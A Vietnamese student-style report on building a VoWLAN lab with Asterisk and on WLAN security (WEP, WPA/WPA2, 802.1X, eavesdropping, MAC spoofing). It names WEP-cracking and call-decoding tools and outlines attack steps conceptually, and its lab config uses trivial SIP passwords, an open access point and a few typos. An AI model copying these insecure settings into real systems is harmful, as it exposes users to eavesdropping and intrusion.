Voice gateway: thiết bị này giúp mạng thoại IP giao tiếp với các loại mạng và hệ thống khác. Ví dụ, một gateway có thể nối một mạng VoIP với mạng PSTN truyền thống, đường dẫn này giúp cho một điện thoại IP có thể giao tiếp với điện thoại thông thường. Và kết nối gateway còn có chức năng backup cho trường hợp mạng WAN bị mất kết nối.
Hạ tầng Wireless LAN: mạng wireless-LAN có vai trò quản lý việc truyền tải các cuộc thoại wireless VoIP. Nhờ đó, người dùng điện thoại có thể di chuyển tự do trong khu vực làm việc. Hạ tầng wireless LAN thường bao gồm các access point thông thường.
Phần tiếp theo: Cài đặt Asterisk trên CentOS
1.3. Dựng mô hình VoWLAN bằng Asterisk
Hình 1.2. Mô hình VoWLAN với Asterisk Server
1.3.1.Cài đặt Asterisk trên CentOS
Cài đặt các thư viện cần thiết:
Sau khi cài đặt, CentOS gần như chứa đầy các thư viện cần thiết.
Tuy nhiên vẫn thiếu hai thư viện để cài đặt được Asterisk trên CentOS.
Hình 1.3. Báo lỗi thiếu C compiler khi thực hiện ./configure
Hình 1.4. Lỗi thiếu termcap
Install GCC và Termcap:
-Vào Application->Add/Remove Program, chọn các gói tương ứng để cài đặt
Hình 1.5. Install GCC
Hình 1.6. Install Termcap
-Apply và chờ quá trình cài đặt kết thúc.
Install Asterisk:
-Download các gói cần thiết. Trong phần này chỉ thực hiện mô phỏng với softphone nên chỉ cần core asterisk.
-
Hình 1.7. Trang chủ Asterisk
-Tạo thư mục asterisk trong /usr/src
-Chép file asterisk vừa download vào và giải nén.
-Thực hiện tuần tự các lệnh compile và install asterisk. Chú ý phải thực hiện trên quyền root.
./configure
Hình 1.8. Quá trình check config
Hình 1.9. Hoàn thành check configure
Make menuselect
Hình 1.10. Tùy chọn cài đặt thêm các gói
Gặp lỗi: “Install ncurses to user menu graphics!” khi sử dụng make menuselect
Fix: Vào Add/Remove Program, cài đặt thêm thư viện ncurses
Hình 1.11. Cài đặt thư việc ncurses
Thực hiện compile lại.
Make distclean
./configure
Make menuselect
Sau khi chọn các gói xong, nhấn “s” để save menu select
Make
Hình 1.12. Thực hiện lệnh Make
Make install
Nếu trong quá trình make menuselect có chọn thêm các gói thì các gói sẽ tự động được download về.
Hình 1.13. Thực hiện lệnh make install
Sau khi make install xong thì quá trình cài đặt đã hoàn thành, ngoài ra có thêm hai tùy chọn không bắt buộc là make progdocs (tài liệu của chương trình) và make samples (tạo file cấu hình mẫu)
Hình 1.14. Make install hoàn thành
ận hành asterisk
-Sau khi cài đặt xong asterisk sẽ tự động được vận hành. Vào Command Line Interface (CLI) bằng lệnh: asterisk -c
-Để chạy asterisk, trong terminal dùng lệnh: asterisk -r
-Nếu asterisk đang chạy sẽ nhận được thông báo lỗi. Vào CLI bằng lệnh asterisk -c
Hình 1.15. Vận hành Asterisk
-Stop asterisk.
Trong CLI: stop now
Cài đặt Asterisk-Gui
Mục đích cài đặt asterisk-gui là giúp nhà quản trị có thể cấu hình asterisk thông qua giao diện web. Asterisk-Gui được download và cài đặt từ SVN
http://svn.digium.com/svn/asterisk-gui/trunk
svn checkout http://svn.digium.com/svn/asterisk-gui/trunk /usr/src/asterisk/asterisk-gui
Thực hiện: make và make install để cài đặt asterisk-gui
1.3.2. Thực hiện cuộc gọi giữa PC 101 và PC 102
Đặt IP cho PC 101: 192.168.1.4
Đặt IP cho PC 101: 192.168.1.5
IP của Asterisk server: 192.168.1.2
Tạo user trong file sip.conf
[101]
type=friend
secret=123456
host=dynamic
port=5060
nat=no; cùng bên với firewall
[102]
type=friend
secret=1234
host=dynamic
port=5060
nat=no
Tạo ngữ cảnh trong file extensions.conf
[m101]
exten => 102,1,Anser
exten => 102,2,Dial(SIP/102)
exten =>102,3 Hangup
[m102]
exten => 101,1,Answer
exten => 101,2,Dial(SIP/101)
exten => 101,3,Hangup
Tiến hành cấu hình Access point : địa chỉ 192.168.1.1, SSID là thuctap, phần Security để đơn giản có thể chọn No Security.
Hình 1.16. Cấu hình SSID cho AP
Sau đó kết nối PC 01 và PC 02 vào AP.
Tiến hành thực hiện register user ở hai máy PC 101 và PC 102, quá trình register không thành công và báo lỗi Request Timeout. User không kết nối được với server Asterisk.
Hình 1.17. Cấu hình cho PC 102
Hình 1.18. Lỗi kết nối
Nguyên nhân là do Firewall của CentOS đã chặn các kết nối nên các client không liên lạc được với server.
Khắc phục:
Ta có thể disable Firewall trên Asterisk server, tuy nhiên cách này sẽ gây nguy hiểm cho server, vì vậy ta nên mở port của giao thức SIP (port UDP 5060) để được phép qua firewall.
Hình 1.19. Mở port giao thức SIP trên server
Kết quả: Đã gọi qua lại được giữa 2 user 101 và 102 và gọi thử vào ngữ cảnh đơn giản.
Hình 1.20. PC 102 kết nối thành công với PC 101
Chương 2: BẢO MẬT TRONG VOWLAN
2.1. Tổng quan về WLAN Security
2.1.1 Xác thực:
Chuẩn IEEE 802.11 định nghĩa hai phương pháp xác thực cơ bản: xác thực hệ thống mở: Open System Authentication (OSA) và xác thực khóa chia sẻ Shared Key Authentication (SKA). Cả hai phương pháp này đều mắc phải những lỗi bảo mất nghiêm trọng khiến cho kẻ tấn công có thể dễ dàng thâm nhập vào hệ thống mạng để theo dõi, phá hoại hay lấy cắp thông tin. Sự ra đời của WPA/WP2 cùng chuẩn IEEE 802.11i – 2004 đã khắc phục được hầu hết những nguy cơ về mất an toàn thông tin kể trên, nếu được cấu hình cài đặt một cách thích hợp và đúng cách.
2.1.1.1 Open System Authentication
Xác thực Hệ thống mở OSA được xem như phương pháp xác thực mặc định của chuẩn IEEE 802.11 thời kì đầu. Các bước xác thực được tiến hành như sau:
1.Client truyền một khung xác thực chứa mã chỉ ra rằng phương pháp xác thực được sử dụng sẽ là OSA về phía AP.
2.AP sau khi nhận được khung xác thực này sẽ truyền một bản tin ACK báo nhận về phía client.
3.Sau đó AP sẽ truyền tiếp một khung xác thực về phía client để chỉ ra rằng quá trình xác thực là hợp lệ.
4.Client sau khi nhận được khung xác thực này sẽ truyền một bản tin ACK báo nhận về phía AP. Đến đây toàn bộ quá trình xác thực đã thành công!
Hình 2.1. Xác thực Hệ thống mở OSA
Thực chất, OSA luôn luôn báo nhận dương với tất cả các client muốn kết nối đến nó! Tuy nhiên, nói như vậy không có nghĩa là việc đảm bảo tính riêng tư cá nhân bị xâm phạm. Các thông tin dữ liệu trao đổi giữa client và AP có thể được mã hóa sử dụng cơ chế WEP. Thật đáng tiếc, WEP lại mắc phải quá nhiều yếu điểm, rất dễ bị tấn công. Nhưng dù sao nó cũng đã làm tốt sứ mệnh lịch sử của mình, đánh dấu một cái nhìn đúng đắn hơn về khía cạnh an toàn thông tin trong truyền thông, nhất là với thông tin vô tuyến.
2.1.1.2 Shared Key Authentication
Xác thực Khóa chia sẻ SKA sử dụng WEP cho quá trình xác thực. WEP cũng có thể cung cấp mã hóa các dữ liệu MAC, nhưng ở đây cần chú ý rằng WEP chỉ được xem như kỹ thuật nhằm bảo vệ trước các hoạt động nghe lén không mục đích, vô tình chứ không có ý nghĩa nhiều đối với các loại hình tấn công có chủ tâm khác. Do WEP có rất nhiều điểm yếu, khuyến cáo không nên dùng WEP để mã hóa dữ liệu cũng như dùng SKA để xác thực.
Khi sử dụng xác thực SKA, cả client và AP phải dùng chung một khóa WEP. AP lưu trữ nhiều khóa WEP vì vậy các client có thể kết nối tới cùng một AP bằng các khóa WEP khác nhau. Các bước xác thực được tiến hành như sau:
1.Đầu tiên, client gửi một khung xác thực về phía AP để chỉ ra rằng xác thực SKA sẽ được sử dụng.
2.AP sau khi nhận được khung xác thực này sẽ gửi bản tin ACK báo nhận về phía client.
3.Tiếp theo, AP gửi một khung xác thực trong đó có chứa 128 octet dưới dạng cleartext về phía client.
4.Client sau khi nhận được khung xác thực này sẽ gửi bản tin ACK báo nhận về phía AP.
5.Client sẽ mã hóa 128 octet này bằng khóa WEP của mình sau đó gửi chúng về phía AP trong một khung xác thực tiếp theo.
6.AP sau khi nhận được khung xác thực này sẽ gửi bản tin ACK báo nhận về phía client.
7.AP sẽ giải mã đoạn 128 octet nhận được từ client và so sánh với 128 octet gốc của minh. Nếu chúng giống nhau, AP sẽ trả lời bằng việc gửi một khung xác thực cuối cùng về phía client để khẳng định xác thực thành công. Trường hợp ngược lại, nếu chúng không trùng khớp, AP sẽ báo xác thực lỗi.
8.Bước cuối cùng, client sau khi nhận được trả lời từ phía AP, sẽ gửi bản tin ACK báo nhận.
Hình 2.2. Xác thực Khóa chia sẻ SKA
Quá trình xác thực SKA có vẻ phức tạp hơn OSA, song thực tế SKA lại kém an toàn hơn so với OSA! Trong xác thực SKA, WEP được sử dụng. Sau khi quá trình xác thực thành công, vẫn khóa WEP này lại dùng để mã hóa các khung dữ liệu trao đổi giữa AP và client. Còn với xác thực OSA, WEP không được sử dụng cho quá trình xác thực, nhưng WEP có thể được dùng để mã hóa dữ liệu truyền dẫn. Vấn đề nảy sinh là ở chỗ, trong quá trình xác thực SKA, AP ban đầu gửi 128 octet dưới dạng cleartext về phía client, sau đó client sẽ dùng khóa WEP để mã hóa 128 octet này rồi gửi trả lại về AP. Như vậy, nếu kẻ tấn công sử dụng các công cụ nắm bắt và phân tích gói tin thì có thể dễ dàng lấy được hai đoạn bản tin 128 octet này bao gồm cả cleartext và đã được mã hóa. Dựa vào đây, việc tìm ra khóa WEP sẽ nhanh chóng và đơn giản hơn nhiều! Tuy nhiên, hiện nay danh giới về sự an toàn giữa hai phương pháp xác thực này gần như đã bị xóa nhòa, bởi vì trên cộng đồng mạng internet, số lượng các công cụ có chức năng dò tìm khóa WEP xuất hiện rất nhiều. Kẻ tấn công chỉ mất chưa đến 10 phút đã có thể tìm ra khóa WEP một cách dễ dàng, không phân biệt phương pháp xác thực được sử dụng là OSA hay SKA!
2.1.1.3. Xác thực dựa trên IEEE 802.1X/EAP
Chuẩn IEEE 802.1X xác thực theo cổng. Các thành phần tham gia vào quá trình này bao gồm Supplicant, Authenticator và Authentication Server. Đối với mạng WLAN thì client đóng vai trò của Supplicant, AP như Authenticator, còn Authentication Server là một máy chủ có chức năng xác thực ví dụ như RADIUS server chẳng hạn. Trong đó, kết nối giữa Authenticator và Authentication Server được xem như là đã được thiết lập an toàn rồi, có thể dùng SSL để trao đổi dữ liệu. Chuẩn IEEE 802.1X sử dụng hai khái niệm: Cổng điều khiển và Cổng không điều khiển đối với Authenticator. Khi tiến hành xác thực, Cổng không điều khiển mở và Supplicant trao đổi dữ liệu với Authenticator thông qua cổng này. Cổng điều khiển chỉ được mở khi Supplicant đã xác thực thành công, phục vụ cho quá trình thiết lập và trao đổi khóa, tiếp sau đó là trao đổi dữ liệu. IEEE 802.1X cho phép sử dụng nhiều kiểu xác thực khác nhau được biết đến với tên gọi chung Giao thức xác thực mở rộng EAP. Quá trình xác thực dựa trên IEEE 802.1X/EAP diễn ra như sau (các khung báo nhận ACK sẽ không được đề cập đến ở đây):
Hình 2.3. Xác thực IEEE 802.1X/EAP
1.Client gửi yêu cầu xác thực tới AP để bắt đầu quá trình.
2.AP sau khi nhận được khung yêu cầu xác thực của client sẽ gửi khung yêu cầu nhận dạng về phía client.
3.Client trả lời bằng khung xác thực chứa thông tin nhận dạng của mình tới AP.
4.AP chuyển tiếp thông tin nhận dạng của client về cho Máy chủ xác thực.
5.Sau khi nhận được những thông tin này, Máy chủ xác thực sẽ yêu cầu các thông tin xác thực cần thiết trong khung xác thực tiếp theo gửi về AP.
6.AP thực hiện chuyển tiếp các yêu cầu này tới client.
7.Client hồi đáp các thông tin xác thực cần thiết gửi về AP.
8.AP chuyển tiếp những thông tin này cho Máy chủ xác thực.
9.Sau khi kiểm tra các thông tin trên của client, Máy chủ xác thực sẽ quyết định client có được phép tham gia vào mạng hay không bằng việc gửi kết quả xác thực về cho AP.
10.AP thông tin lại cho client.
Trong toàn bộ quá trình này AP đóng vai trò như một cầu nối giữa client và Máy chủ xác thực. Mọi thông tin trao đổi đều được thực hiện qua Cổng không điều khiển. Có nhiều kiểu giao thức EAP cho phép được sử dụng như: EAP-MD5, EAP-LEAP, EAP-TLS, TTLS, PEAP, EAP-FAST, trong đó EAP-TLS thường được sử dụng. Kết thúc quá trình này, Cổng điều khiển được mở, các thiết bị thực hiện công việc trao đổi và thiết lập khóa.
Nếu giao thức xác thực EAP trước đó sử dụng là xác thực hai chiều thì khóa PMK sẽ được tạo ra trong bước này. Khi ấy, cả client và Máy chủ xác thực đều biết rõ về nhau nên thống nhất chung một khóa. Khóa này có ý nghĩa trên từng phiên làm việc và với từng client. Máy chủ xác thực sau đó sẽ tạo ra một bản sao của khóa PMK rồi gửi về AP. Nhờ đó, AP và client đã có chung khóa PMK. Trong trường hợp hệ thống mạng không sử dụng Máy chủ xác thực, khóa PMK sẽ được tạo ra từ khóa tĩnh nhập vào thủ công trước đó, trên cả client và AP.
Bắt tay bốn bước
Quá trình bắt tay bốn bước được thực hiện giữa AP và client sau khi đã có khóa PMK. Quá trình này nhằm tạo ra các khóa PTK và GTK.
Đầu tiên, AP tạo ra số ANonce rồi gửi về client. Client sử dụng khóa PMK để sinh ra khóa PTK, sau đó dùng khóa PTK này kết hợp với số ANonce để tạo ra mã MIC. Mục đích của việc làm này là để AP xác định xem client thực sự có khóa PMK chính xác không. Sau khi tạo ra mã MIC rồi, client cũng sinh ra số SNonce của mình và gửi về phía AP. AP nhận được những thông tin này, dựa vào mã MIC để khẳng định rằng client có cùng khóa PMK giống mình. Sau đó AP cũng phải sử dụng khóa PMK của mình để sinh ra khóa PTK, dùng khóa PTK này kết hợp với số SNonce để tạo ra mã MIC. Cũng trong lúc này, AP sử dụng khóa GMK tạo ra khóa GTK. Khóa GTK, mã MIC cùng với số Anonce mới sẽ được mã hóa bằng khóa PTK và gửi về phía client. Client dùng khóa PTK của mình để giải mã, sau đó kiểm tra mã MIC để chắc chắn rằng AP cũng có khóa PMK giống mình. Sau đó client tiến hành cài đặt các khóa PTK và GTK. Khóa PTK được dùng để mã hóa các bản tin unicast, có giá trị duy nhất dành cho mỗi client. Khóa GTK được dùng để mã hóa các bản tin multicast, broadcast, có giá trị chung giống nhau cho nhiều client hợp pháp. Cuối cùng client gửi bản tin xác nhận về phía AP. AP thực hiện cài đặt khóa phục vụ cho quá trình trao đổi thông tin tiếp sau. Từ lúc này, mọi dữ liệu trao đổi unicast giữa AP và client sẽ được mã hóa bằng khóa PTK, với multicast và broadcast được mã hóa bằng khóa GTK.
Hình 2.4. Quá trình bắt tay bốn bước
2.1.2. Mã hóa
Mã hóa thực chất là quá trình thể hiện thông tin cần bảo mật dưới một dạng khác. Thông tin này chỉ có thể đọc được theo đúng nghĩa nếu như phía thu có khóa để giải mã ngược lại. Mã hóa đóng vai trò hết sức quan trọng trong việc đảm bảo thông tin không bị lộ, nhất là với môi trường vô tuyến của mạng WLAN, khi mà việc nghe trộm thông tin gần như không thể ngăn chặn được.
2.1.2.1. Mã hóa WEP
WEP là phương pháp mã hóa lớp 2 sử dụng thuật toán mã hóa dòng RC4. WEP ra đời nhằm ba mục đích chính: đảm bảo tính bảo mật, điều khiển truy nhập và toàn vẹn dữ liệu. Trong đó, việc đảm bảo tính bảo mật được thực hiện bằng cách mã hóa dữ liệu truyền dẫn. Khóa WEP tĩnh được sử dụng như một cơ chế điều khiển truy nhập, chỉ những client nào có khóa WEP giống như của AP mới được phép tham gia vào mạng. Bên cạnh đó,WEP sử dụng giá trị ICV để đảm bảo dữ liệu không bị sửa đổi. Giá trị ICV được tính toán dựa trên dữ liệu cần truyền dẫn, trước khi nó được mã hóa. WEP có hai phiên bản là 64 bit và 128 bit. Khóa WEP bao gồm 24 bit IV và 40 bit (đối với WEP 64 bit) hay 104 bit khóa tĩnh (đối với WEP 104 bit). Sự xuất hiện của 24 bit IV nhằm mục đích đảm bảo với các khung dữ liệu khác nhau thì sẽ được mã hóa bằng các khóa khác nhau. Giá trị IV này sẽ được lấy ngẫu nhiên đối với từng khung dữ liệu. Tuy nhiên, với 24 bit IV này, tương đương với chỉ có khoảng 16.777.216 khóa WEP khác nhau được tạo ra. Sau đó, nếu cần, chúng sẽ được sử dụng lại.
Quá trình mã hóa WEP diễn ra như sau: Đầu tiên, WEP chạy thuật toán CRC trên dữ liệu gốc để tạo ra giá trị ICV, giá trị này sau đó được gắn vào phía sau của phần dữ liệu. Một giá trị IV 24 bit được tạo ra và kết hợp với khóa tĩnh. WEP sau đó sẽ sử dụng một bộ tạo số giả ngẫu nhiên với đầu vào là giá trị IV và khóa tĩnh nhằm tạo ra một chuỗi số mới. Chuỗi số này có cùng độ dài với phần dữ liệu cần mã hóa. Tiếp theo chúng được đưa kết hợp lại với nhau bằng thuật toán XOR. Kết quả chính là dữ liệu đã được mã hóa. Phần dữ liệu mã hóa này sẽ được gắn thêm tiền tố là giá trị IV 24 bit dưới dạng cleartext. Cuối cùng, chúng được phát đến phía thu.
Tại phía thu, giá trị IV được tách ra, kết hợp với khóa tĩnh, thông qua bộ tạo số giả ngẫu nhiên, cũng sinh ra một chuỗi số giống như bên phát. Chuỗi số này sẽ được dùng để tìm ra dữ liệu gốc ban đầu bằng việc XOR ngược cùng với chuỗi dữ liệu mã hóa đã nhận được.
Hình 2.5. Quá trình mã hóa và giải mã WEP
Thật không may, WEP có không ít điểm yếu để kẻ tấn công có thể lợi dụng, các điểm yếu này có thể kể đến như sau:
Xung đột giá trị IV: Bởi vì giá trị IV chỉ gồm có 24 bit nên trong một mạng có lưu lượng lớn, giá trị này sẽ bị sử dụng lại rất nhanh. Dựa vào hiện tượng này, kẻ tấn công có thể dễ dàng tìm ra khóa WEP hơn.
Các khóa yếu: Do bản thân thuật toán RC4 được sử dụng mà dựa trên một số khóa IV yếu, kẻ tấn công có thể tìm ra khóa WEP đơn giản và nhanh chóng hơn.
Bơm gói tin: Đối với những mạng có lưu lượng thông tin thấp, kẻ tấn công có thể sử dụng các công cụ bơm gói tin nhằm gia tăng lưu lượng để nắm bắt các gói tin có ích.
Thay đổi gói tin: Việc kiểm tra tính toàn vẹn của gói tin dựa trên giá trị ICV không thực sự đáng tin cậy. Các gói tin mã hóa bằng WEP vẫn có thể bị thay đổi.
Thực tế hiện nay, kẻ tấn công có thể sử dụng các công cụ bẻ khóa WEP một cách dễ dàng trong vòng từ 5 đến 10 phút! Quá trình này sẽ được đề cập đến trong phần tiếp theo.
2.1.2.2. Mã hóa TKIP
TKIP là một phương pháp mã hóa tùy chọn theo chuẩn IEEE 802.11i. TKIP cũng sử dụng thuật toán RC4 để mã hóa giống như WEP. Thực chất, TKIP được xem như một sự mở rộng của WEP, khắc phục hoàn toàn những điểm yếu mà WEP mắc phải. TKIP sử dụng 128 bit khóa tĩnh kết hợp với 48 bit IV, địa chỉ MAC nguồn, MAC đích nhằm tạo ra một khóa phức hợp, có giá trị khác nhau đối với từng gói tin. Với 48 bit IV, tương đương 281.474.976.710.656 giá trị mà IV có thể nhận, cùng với quá trình tính toán khóa phức tạp, TKIP đã ngăn chặn được hai điểm yếu của WEP là Xung đột giá trị IV và Khóa yếu. TKIP cũng sử dụng phương pháp đếm số thứ tự để chống lại việc bơm gói tin mà kẻ tấn công hay lợi dụng. Thêm vào đó, TKIP tính toán mã toàn vẹn bản tin MIC dựa trên thuật toán Michael, được đánh giá là mạnh hơn nhiều so với CRC mà WEP sử dụng, do đó đảm bảo gói tin không bị thay đổi.
Bởi vì TKIP sử dụng nhiều thành phần để tạo khóa hơn, cùng với giá trị MIC được tính toán, nó làm tăng thêm 20 byte không mang thông tin vào khung dữ liệu, trong khi với WEP chỉ cần 8 byte. TKIP cũng sử dụng thuật toán mã hóa RC4 nên không đòi hỏi năng lực xử lý của chíp nhiều, do đó phần lớn các card cũ sử dụng mã hóa WEP có thể được nâng cấp firmware để hỗ trợ tương thích với TKIP. TKIP là lựa chọn thích hợp giúp giảm thiểu chi phí đầu tư nâng cấp thiết bị kết nối mạng, hơn nữa vẫn hoàn toàn tuân theo tiêu chuẩn WPA của Wifi Alliance đưa ra.
2.1.2.3. Mã hóa CCMP
CCMP được xem như là phương pháp mã hóa mặc định theo chuẩn IEEE 802.11i. Phương pháp này sử dụng thuật toán mã hóa tiên tiến AES (thuật toán Rijndael). CCMP/AES sử dụng khóa có độ dài 128 bit để mã hóa mỗi khối dữ liệu cũng có chiều dài cố định là 128 bít. Mã kiểm tra tính toàn vẹn của bản tin 8 bit MIC được đánh giá là mạnh hơn so với của TKIP. Bởi vì thuật toán mã hóa AES là rất mạnh nên việc mã hóa trên từng gói tin là không cần thiết.
Mã hóa CCMP/AES sẽ làm tăng thêm 16 byte không mang thông tin vào khung dữ liệu. Bởi vì thuật toán AES yêu cầu năng lực xử lý của chip lớn nên các card mạng không dây cũ không thể đáp ứng được. Những card mạng này không thể dùng biện pháp nâng cấp firmware như đối với TKIP mà phải tiến hành nâng cấp về phần cứng mới có thể hỗ trợ CCMP/AES hay WPA2. Chính vì điều này đã làm cản trở việc triển khai WPA2 rộng rãi. Tuy nhiên, với các mạng yêu cầu mức độ bảo mật cao, khuyến nghị nên chọn thay đổi về phần cứng để hỗ trợ WPA2. Hiện nay, một số hãng sử dụng giải pháp phần mềm nhằm thực hiện việc này, song thực tế cho thấy, năng lực xử lý của card sẽ rất chậm, và nguy cơ xảy ra sai sót là rất cao cũng như không đảm bảo mức độ ổn định cần thiết cho tín hiệu.
2.1.3. Tiêu chuẩn an ninh WPA/WPA2
Tổ chức Liên minh các nhà sản xuất lớn về thiết bị wifi – Wifi Alliance, được thành lập để giúp đảm bảo tính tương thích giữa các sản phẩm wifi của các hãng khác nhau. Nhằm cải thiện mức độ an toàn về mặt thông tin trong mạng 802.11 mà không cần yêu cầu nâng cấp phần cứng, Wifi Alliance thông qua TKIP như một tiêu chuẩn bảo mật cần thiết khi triển khai mạng lưới được cấp chứng nhận Wifi. Kiểu bảo mật này được gọi với tên là WPA. WPA ra đời trước khi chuẩn IEEE 802.11i – 2004 được chính thức thông qua. Nó bao gồm việc quản lý khóa và quá trình xác thực. Tiếp sau đó, WPA2 được đưa ra, như một tiêu chuẩn bảo mật bám sát hơn theo chuẩn 802.11i của IEEE. Điểm khác biệt lớn nhất giữa WPA và WPA2 là thay vì sử dụng AES để đảm bảo tính bảo mật và toàn vẹn dữ liệu thì WPA dùng TKIP cho việc mã hóa và thuật toán Michael cho việc xác thực trên từng gói dữ liệu.
Mỗi phiên bản của WPA đều được chia thành hai loại: Personal dành cho hộ gia đình và văn phòng quy mô nhỏ, Enterprise dành cho doanh nghiệp lớn có cơ sở hạ tầng mạng đầy đủ. Điểm khác biệt duy nhất đáng kể giữa hai loại này là ở hình thức có được khóa PMK. Với Personal, khóa PMK sinh ra từ khóa tĩnh được nhập vào thủ công trên AP và các client. Rõ ràng cách làm này là không khả thi đối với các mạng lưới có quy mô lớn. Do đó trong Enterprise, khóa PMK nhận được từ quá trình xác thực IEEE 802.1X/EAP. Việc cấp phát khóa này là hoàn toàn tự động và tương đối an toàn. Sau khi đã xác thực lẫn nhau rồi, client và Máy chủ xác thực xây dựng khóa PMK dựa trên các thông tin đã biết. Khóa này là giống nhau trên cả client và Máy chủ xác thực. Máy chủ xác thực sẽ tiến hành sao chép một bản khóa PMK này rồi gửi về cho AP. Lúc này, cả AP và client đều đã nhận được khóa PMK phù hợp. Trong thực tế, Máy chủ xác thực thường được sử dụng là Máy chủ RADIUS.
So sánh giữa WEP, WPA và WPA2
WPA được đánh giá là kém an toàn hơn so với người anh em WPA2. Tuy nhiên, lợi thế của WPA là không yêu cầu cao về phần cứng. Do WPA sử dụng TKIP mã hóa theo thuật toán RC4 giống như WEP nên hầu hết các card mạng không dây cũ hỗ trợ WEP chỉ cần được nâng cấp firmware là có thể hoạt động tương thích với tiêu chuẩn của WPA.
WPA2 sử dụng CCMP/AES cho việc mã hóa dữ liệu và kiểm tra tính toàn vẹn của gói tin. CCMP/AES là một cơ chế mã hóa rất mạnh và phức tạp do đó yêu cầu cao về năng lực xử lý của chip. Cũng chính vì điều này mà hiện nay WPA2 chưa được triển khai rộng dãi như WPA. Lý do là WPA2 cần phải nâng cấp về mặt phần cứng, tốn kém hơn nhiều so với viêc cập nhật firmware đối với WPA. Tuy nhiên, với các hệ thống mạng yêu cầu mức độ an ninh cao thì khuyến nghị nên sử dụng WPA2. Việc lựa chọn tiêu chuẩn an ninh nào là hoàn toàn phụ thuộc vào sự cân bằng giữa tiềm lực tài chính và mức độ an toàn thông tin cần đảm bảo.
2.2. Các nguy cơ và biện pháp đảm bảo thông tin trong VoWLAN
2.2.1. Tấn công bị động
Tấn công bị động (hay nghe lén) là khi kẻ tấn công lấy cắp thông tin được trao đổi giữa hai thực thể nguồn và đích hợp pháp, nhưng không tác động đến hai thực thể này cũng như đến quá trình truyền thông. Các thông tin này sau khi lấy cắp sẽ được sử dụng cho những mục đích tấn công khác như xâm nhập ở mức độ sâu hơn hay giả mạo thực thể hợp pháp. Quá trình tấn công bắt đầu bằng việc thu giữ các gói tin, tiến hành giải mã, sau đó trích ra những thông tin cần thiết như thông tin xác thực, mật khẩu, số thẻ tín dụng, thông tin cá nhân, sở hữu trí tuệ hay các dữ liệu nhạy cảm khác. Đôi khi, kiểu tấn công này cũng được sử dụng với mục đích phân tích các luồng lưu lượng, thống kê, báo cáo để nhận biết thuộc tính lưu lượng trong mạng phục vụ cho công việc quản trị đạt hiệu quả cao hơn.
Bản chất môi trường truyền thông trong mạng WLAN là dựa trên sóng điện từ, do đó việc bị nghe trộm là không thể tránh khỏi. Tuy nhiên cũng có thể triển khai những biện pháp sau nhằm giảm thiểu nguy cơ thông tin có ích bị kẻ tấn công lấy cắp được. Đầu tiên phải tiến hành đo kiểm và thiết kế vùng che phủ sóng wifi thật tỉ mỉ và kỹ lưỡng sao cho tín hiệu wifi không bị tràn ra quá xa khu vực cần thiết, tránh việc sử dụng trái phép và gây hại cho tài nguyên mạng. Phương pháp này chỉ có ý nghĩa tương đối đảm bảo an toàn về mặt vật lý. Biện pháp thứ hai, đóng vai trò quyết định đó chính là sử dụng các cơ chế mã hóa an toàn cho toàn bộ quá trình xác thực và truyền dữ liệu.
Khi mạng Wifi mới ra đời, WEP được sử dụng như một tùy chọn cho việc mã hóa. Tuy nhiên, WEP ra đời chưa được bao lâu thì đã bộc lộ những điểm yếu không thể khắc phục. Việc sử dụng thêm giá trị IV là nguyên nhân chính của đa số các vấn đề với WEP. Giá trị IV này được truyền dưới dạng không mã hóa nên có thể bị nghe trộm dễ dàng. Bởi vì IV chỉ có độ dài 24 bit tương đương với khoảng hơn 16.000.000 giá trị nên trong những mạng Wifi có lưu lượng trao đổi thông tin lớn thì chỉ mất khoảng từ 5 dến 10 phút các giá trị IV này sẽ bị sử dụng lại, gọi là hiện tượng xung đột IV. Lợi dụng điều này kẻ tấn công dễ dàng tìm ra WEP key hơn, nhất là khi sử dụng các giá trị IV yếu. Đối với các mạng Wifi có lưu lượng thấp, biện pháp bơm gói tin được thực hiện nhằm tăng lưu thông mạng để nhanh chóng nắm bắt được đủ số lượng gói tin cần thiết. Một khi đã thu thập đủ lượng gói tin nhất định rồi, công việc tiếp theo cần làm là chạy chương trình giải mã để tìm ra WEP key (sơ đồ đầy đủ trong hình). Tất cả quá trình này chỉ mất khoảng từ 5 đến 10 phút! Một số phần mềm thường được sử dụng là bộ công cụ AirCrack, WEPcrack, WEPoff, …
Hình 2.6. Các bước bẻ khóa WEP
Cuối cùng, phần dữ liệu thoại trong các gói tin sẽ được giải mã bằng bộ giải mã thoại như VOMIT (cho G.711) và IP Crack (cho G.729A) hay các chương trình có chức năng tương tự khác.
Để khắc phục những nhược điểm mà WEP mắc phải, sự ra đời của WPA/WPA2 như một sự tất yếu. Do đặc thù của dịch vụ VoWLAN, độ trễ cần phải được giảm xuống đến mức tối thiểu, nên trong các cấu hình mạng thường xác thực bằng WPA/WPA2 PSK sử dụng mã hóa TKIP/RC4. Ưu điểm của lựa chọn này ở chỗ, WPA/WPA2 PSK không yêu cầu hệ thống mạng phải có máy chủ làm nhiệm vụ xác thực, giảm độ phức tạp. Không những thế mã hóa TKIP/RC4 được lựa chọn do TKIP cũng dựa trên thuật toán mã hóa RC4 giống như WEP nhưng đã khắc phục được hầu hết các hạn chế của WEP, bằng việc dùng khóa 128 bit, 48 bit IV, kết hợp với địa chỉ MAC của thiết bị nguồn và đích để tạo ra khóa. TKIP còn có cơ chế chống tấn công bơm gói tin và sử dụng MIC để kiểm tra tính toàn vẹn của gói tin. Đặc biệt, các thiết bị hỗ trợ WEP đều có thể nâng cấp firmware để cung cấp mã hóa TKIP do TKIP không yêu cầu cao về năng lực xử lí của phần cứng. Tuy nhiên, WPA/WPA2 PSK cũng có một nhược điểm nhỏ đó là không chống lại được hình thức tấn công kiểu social engineering.
2.2.2. Truy cập trái phép
Truy cập trái phép (unauthorized access) là kiểu tấn công vào quá trình xác thực có tính chủ động. Bằng biện pháp nào đó, kẻ tấn công có được thông tin cần thiết cho quá trình xác thực và trao đổi thông tin của client hay AP hợp pháp. Sau đó sẽ sử dụng những thông tin này để giả danh client hay AP thâm nhập hợp pháp vào mạng.
Biện pháp lọc địa chỉ MAC đôi khi được sử dụng để điều khiển truy nhập mạng. Tuy nhiên nó không được xem như một phương thức bảo mật. Bởi vì kẻ tấn công chỉ cần sử dụng một chương trình nắm bắt gói tin thông thường như NetStumbler cũng có thể biết được địa chỉ MAC hợp pháp sau đó dùng một chương trình khác để giả mạo địa chỉ MAC này, ví dụ như SMAC chẳng hạn. Như vậy kẻ tấn công đã có thể dễ dàng vượt qua biện pháp điều khiển truy nhập này.
